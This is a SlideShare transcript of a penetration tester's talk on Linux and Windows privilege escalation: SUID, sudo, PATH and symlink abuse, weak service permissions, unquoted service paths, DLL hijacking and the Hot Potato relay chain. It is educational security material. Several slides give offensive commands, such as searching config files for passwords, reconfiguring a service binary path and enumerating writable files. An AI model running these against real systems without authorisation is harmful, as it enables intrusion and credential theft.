SlideShare a Scribd company logo

1000 to 0

•
•
Sunny Neo
Sunny Neo

Privilege Escalation for Windows and Linux

Technology
1 of 72
Download to read offline
1000 to 0 Sunny Neo 1
Who am I •Pen tester from Singapore •Started learning about security since 15 and still learning •Want to learn: Reverse Engineering, Kernel Debugging & Exploit 2
What I am not talking about •How to use Kernel exploit 3
What I am talking •How to find typical misconfigurations made by Sysadmins and Developers •How to capitalize on the misconfigurations to gain super user privileges 4
Why am I talking about this? •Running limited shell is not fun •Running kernel exploit is a high risk activity •Kernel exploits are rare •Kernel vulnerabilities usually get patched very quickly 5
Linux Privilege Escalation 6
SUID/SGID •Set User ID Bit / Set Group ID Bit •Enable users to execute file with file owner/group’s permission •Improve security by not assigning permissions for sensitive files to every user -rwsr-xr-x 1 root root 48920 Nov 13 00:58 /usr/bin/passwd 7
SUID/SGID What if Buffer Overflow Exists? Command Injection Exists? Interactive Shell Exists? 8
SUID/SGID Source: http://www.rebootuser.com/?p=1623 9
SUID/SGID 10
SUID/SGID Find all SUID/SGID files find / -perm /u=s,g=s -type f -exec ls -la {} + 2> /dev/null 11
sudo •Enable users to run command with privilege of another user •Commonly found in scripts to run privileged commands without password authentication 12
sudo 13
sudo 14
sudo 15 VMware vRealize Appliance Source: http://www.shellntel.com/blog/2016/6/7/weaponizing-nessus
sudo 16 VMWare vRealize Appliance Source: http://www.shellntel.com/blog/2016/6/7/weaponizing-nessus
Weak Folder/File Permission •Reveal sensitive information in history or configuration files •Enable modification of important files or scripts executed by Init or Cron job 17
Weak Folder/File Permission •Look out for • Home Directory (.rhosts, .ssh/authorized_keys, .bashrc, .*_history) • Config files (httpd.conf, my.cnf, config.inc.php, sshd.config) • Source codes (.php, .c, .cpp, .pl, .py) • Init (/etc/rc.*) and Cron job (/etc/cron.*/, /var/spool/cron/) • Scripts executed by Init or Cron job 18
Weak Folder/File Permission 19
Weak Folder/File Permission World Readable Files/Folders find / -perm /o+r -exec ls -la {} + 2>/dev/null World Writeable Files/Folder find / -perm /o+w -exec ls -la {} + 2>/dev/null Search for ‘password’ in conf files find / -name *.conf -type f -exec grep -Hn password {} + 2>/dev/null 20
PATH •Environment variable for Shell to search for executable •Meant for convenience however could be abused for Relative Path commands 21
PATH Assume this is a complex app that allows an authenticated user to view log SUID Enabled 22
PATH 23
PATH 24
Symbolic Link Attack •Symbolic link a.k.a soft link points to another file by filename •Able to link any files regardless of the existence of target file •Race Condition •User with write access 25
Symbolic Link Attack Cron Job runs this Program to ensure foo is always Writable 26
Symbolic Link Attack User has write access for /tmp to create symlink foo User has NO write access to /etc/cron.d/john YET 27
Symbolic Link Attack After Cron Job executed the Program User has write access to /etc/cron.d/john 28
Symbolic Link Attack Source: https://packetstormsecurity.com/files/133692/Ubuntu-Security-Notice-USN-2744-1.html 29
Linux Enumeration Scripts •LinEnum - http://www.rebootuser.com/?p=1758 •LinuxPrivChecker - www.securitysift.com/download/linuxprivchecker.py 30
Windows Privilege Escalation 31
Weak Folder/File Permission 32
Weak Folder/File Permission The vulnerability is due to incorrect installation and permissions settings on binary files during the MSE physical or virtual appliance install procedure. An attacker could exploit this vulnerability by logging into the device and escalating their privileges. A successful exploit could allow the attacker to acquire root-level privileges and take full control of the device. Source: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151104-privmse 33
Weak Folder/File Permission Get list of Services not in System32 for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> services.txt Get Permissions for /f eol^=^"^ delims^=^" %a in (services.txt) do cmd.exe /c icacls "%a" >> permissions.txt Source: http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/ 34
Weak Service Permission •Well known vulnerability for Windows XP SP1 and Windows 2003 Server •MS06-011 - Upnphost, SCardSvr, SSDPSRV, DnsCache, and DHCP services Source: http://www.fuzzysecurity.com/tutorials/16.html 35
Weak Service Permission •sc config upnphost binpath=“ “ Source: http://www.fuzzysecurity.com/tutorials/16.html 36
Weak Service Permission Get permissions on Services accesschk.exe –uwcqv “Authenticated Users” * accesschk.exe –uwcqv “Users”|”Everyone”|”Any Other Group” * Source: http://www.fuzzysecurity.com/tutorials/16.html 37
Weak Registry Permission •Services registered on the System are stored in the Registry • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices •Weak Registry Permission enables non-privilege user to modify the Service’s configurations 38
Unquoted Service Paths DisplayName Name PathName hMailServer hMailServer C:ServerMail ServerhMailServerBinhMailServer.exe RunAsService Mobile Broadband HL Service Mobile Broadband HL Service "C:ProgramDataMobileBrServmbbservice.exe" VMware Tools VMTools "C:Program FilesVMwareVMware Toolsvmtoolsd.exe" 39
Unquoted Service Paths •Unquoted Service Paths with Space(s) lead to ambiguous binary executions •Windows will attempt to execute a Path ending with the first space onwards •Number of attempted execution = Number of Space + 1 40
Unquoted Service Paths C:Program FilesService Dirbinary name.exe 1) C:Program.exe 2) C:Program FilesService.exe 3) C:Program FilesService Dirbinary.exe 4) C:Program FilesService Dirbinary name.exe 41
Unquoted Service Paths •Look out for services installed in C:*Folder* •“Authenticated Users” has Modify Permission for C:*Folder* inherited from C: Permissions (except for folders created by Windows) 42
Unquoted Service Paths 43
Unquoted Service Paths The hMailServer service is now registered in Windows with a quoted path, to prevent the service from being vulnerable to "Unquoted service path". Unquoted service paths would allow a user with access to the server where hMailServer runs, but with less privileges than hMailServer, to gain the privileges of hMailServer by creating a new executable and placing it in C:ProgramFileshMailServerhMailserver.exe. Not Right! 44
Unquoted Service Paths C:ServerMail ServerhmailServerBinhMailServer.exe RunAsService 45
Unquoted Service Paths Mail.exe is a reverse shell 46
Unquoted Service Paths 47
Unquoted Service Paths Find all Unquoted Service Paths wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows" |findstr /i /v """ Quick Exploit Use Metasploit - exploit/windows/local/trusted_service_path 48
DLL Hijacking •Dynamic Link Libraries (DLL) •Shared Library Concept – allows application to reuse code in DLL •Hijacking happens when an application loads an attacker’s DLL instead of the intended DLL 49
DLL Hijacking •Loading non-existent DLL •Loading DLL without fully qualified path 50
DLL Hijacking •Windows 32 bits DLL Search Order with SafeDllSearchMode Enabled 1. Directory from which application is loaded 2. Windows 32bit System Directory (C:WindowsSystem32) 3. Windows 16 bits System Directory (C:WindowsSystem) 4. Windows Directory (C:Windows) 5. Current Directory 6. Directories listed in %PATH% 51
DLL Hijacking •CVE-2016-2855: Huawei Mobile Broadband HL Service Local Privilege Escalation •The Huawei Mobile Broadband HL Service 22.001.25.00.03 and earlier uses a weak ACL for the MobileBrServ program data directory, which allows local users to gain SYSTEM privileges by modifying VERSION.dll. 52
DLL Hijacking 53
DLL Hijacking 54
DLL Hijacking Used ExportsToC++ to generate all Export functions from C:WindowsSystem32version.dll 55
DLL Hijacking 56
DLL Hijacking 57
DLL Hijacking 58
Windows Enumeration Script/Tool •Windows Privsec Check - https://github.com/pentestmonkey/windows-privesc-check 59
Hot Potato •Researched and Developed by Stephen Breen @ FoxGlove Security •Combined 3 vulnerabilities to perform Privilege Escalation •NetBIOS Name Services (NBNS) Spoofing •Web Proxy Auto-Discovery Protocol (WPAD) Man In The Middle Attack •HTTP-> SMB Relay 60
NBNS Spoofing •Windows resolves domain name by the order • Local Host File @ C:WindowsSystem32driversetchosts • DNS Cache • DNS Server • Local LMHOST File @ C:WindowsSystem32driversetclmhosts.sam • NetBIOS broadcast •Anyone can respond to the NetBIOS Broadcast ☺ 61
WPAD Man in the Middle • WPAD is enabled by default • IE will automatically look up http://WPAD/wpad.dat for proxy settings 62
NTLM Authentication •Challenge – Response •3 Types of Messages •Negotiation •Challenge •Authentication 63
SMB -> SMB Relay •15 years old SMB Relay/Reflection Attack Attacker MITMed the connection to legitimate SMB Server Legitimate Client (3) Client sends the Attacker the NTLM Challenge (2) Attacker connects to Client SMB service and asks for a NTLM Challenge (1) Client connects to SMB Server and asks for a NTLM Challenge (4) Attacker modifies Client’s Challenge and sends it back to Client as his own for (1) (5) Client receives (1) Challenge, encrypts it using his credential (hash) and sends it back to Attacker (6) Attacker sends back the response he receives and successfully authenticated for (2) 64
SMB -> SMB Relay •MS08-068 stops this by preventing relaying back the Challenges Keys from where they were issued – SMB to SMB Relay •Doesn’t stop cross protocol attack HTTP -> SMB Relay ☺ 65
HTTP-> SMB Relay •NTLM is part of Integrated Windows Authentication •IE supports Integrated Windows Authentication (NTLM Authentication) •Automatic Logon is enabled by default for Intranet Zone •Localhost is part of Intranet Zone ☺ 66
Hot Potato (Windows 7) Steps 1. Start NBNS Spoofing for WPAD and start Web Server on localhost:80 2. Start Windows Defender Update (NT Authority/System) 3. WPAD settings redirect Windows Defender Update to http://localhost/GETHASHES 4. http://localhost/GETHASHES asks for NTLM authentication and connects to localhost SMB to obtain Challenge then forward it to Windows Defender Update 5. Windows Defender Update sends NTLM Response 6. Hot Potato resumes the SMB Authentication with the NTLM Response ☺ 67
DEMO 68
More stuff •Pass The Hash •Mimikatz – Scraping cleartext credentials in Windows LSASS subsystem memory for logged on users 69
Summary •Non-exhaustive list of privilege escalation techniques •More awareness has to be raised for Sysadmin and developers 70
Tools • LinEnum - http://www.rebootuser.com/?p=1758 • LinuxPrivChecker - www.securitysift.com/download/linuxprivchecker.py • Windows-privesc-check - https://github.com/pentestmonkey/windows-privesc-check • Hot Potato - https://github.com/foxglovesec/Potato • Mimikatz - https://github.com/gentilkiwi/mimikatz (Available on Metasploit and Powerspoits) • Powersploits - https://github.com/PowerShellMafia/PowerSploit • PowerOPS (Run Powershell commands without Powershell.exe ) – https://github.com/fdiskyou/PowerOPS 71
Reference • http://www.vantagepoint.sg/news/48-security-wednesdays-9-local-privilege-escalation-nus-greyhats • https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ • http://www.dankalia.com/tutor/01005/0100501004.htm • http://netsec.ws/?p=309 • http://www.fuzzysecurity.com/tutorials/16.html • https://labs.mwrinfosecurity.com/system/assets/760/original/Windows_Services_-_All_roads_lead_to_SYSTEM.pdf • http://toshellandback.com/2015/11/24/ms-priv-esc/ • https://foxglovesecurity.com/2016/01/16/hot-potato/ • https://squirtle.googlecode.com/files/NTLM%20is%20Dead%20-%20DefCon%2016.pdf 72

Recommended

Hot potato Privilege Escalation
Hot potato Privilege EscalationHot potato Privilege Escalation
Hot potato Privilege Escalation
Sunny Neo
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
Mike Felch
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
Aditya K Sood
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
Mike Felch
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 

Recommended

Hot potato Privilege Escalation
Hot potato Privilege EscalationHot potato Privilege Escalation
Hot potato Privilege Escalation
Sunny Neo
 
Web security for developers
Web security for developersWeb security for developers
Web security for developers
Sunny Neo
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
Mike Felch
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
Aditya K Sood
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
Mike Felch
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
Mike Felch
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
Mike Felch
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware AnalysisďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
Royce Davis
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
Royce Davis
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
Chris Gates
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat Security Conference
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Chris Gates
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
Shakacon
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
Server hardening
Server hardeningServer hardening
Server hardening
Teja Babu
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 

More Related Content

What's hot

Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
Mike Felch
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
Mike Felch
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
Royce Davis
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat Security Conference
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 

What's hot (20)

Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware AnalysisďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 

Similar to 1000 to 0

unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
Brandon Arvanaghi
 
Securing your Container Environment with Open Source
Securing your Container Environment with Open SourceSecuring your Container Environment with Open Source
Securing your Container Environment with Open Source
Michael Ducy
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
NetSPI
 
Watch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty ResultsWatch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty Results
jtmelton
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
Xavier Ashe
 

Similar to 1000 to 0 (20)

Server hardening
Server hardeningServer hardening
Server hardening
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
So you want to be a security expert
So you want to be a security expertSo you want to be a security expert
So you want to be a security expert
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
 
Securing your Container Environment with Open Source
Securing your Container Environment with Open SourceSecuring your Container Environment with Open Source
Securing your Container Environment with Open Source
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Windows Malware Techniques
Windows Malware TechniquesWindows Malware Techniques
Windows Malware Techniques
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
 
5. centos security
5. centos security5. centos security
5. centos security
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
 
Watch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty ResultsWatch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty Results
 
Unraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudUnraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production Cloud
 
Tokyo OpenStack Summit 2015: Unraveling Docker Security
Tokyo OpenStack Summit 2015: Unraveling Docker SecurityTokyo OpenStack Summit 2015: Unraveling Docker Security
Tokyo OpenStack Summit 2015: Unraveling Docker Security
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Security tools
Security toolsSecurity tools
Security tools
 

Recently uploaded

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel AraĂşjo
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Recently uploaded (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
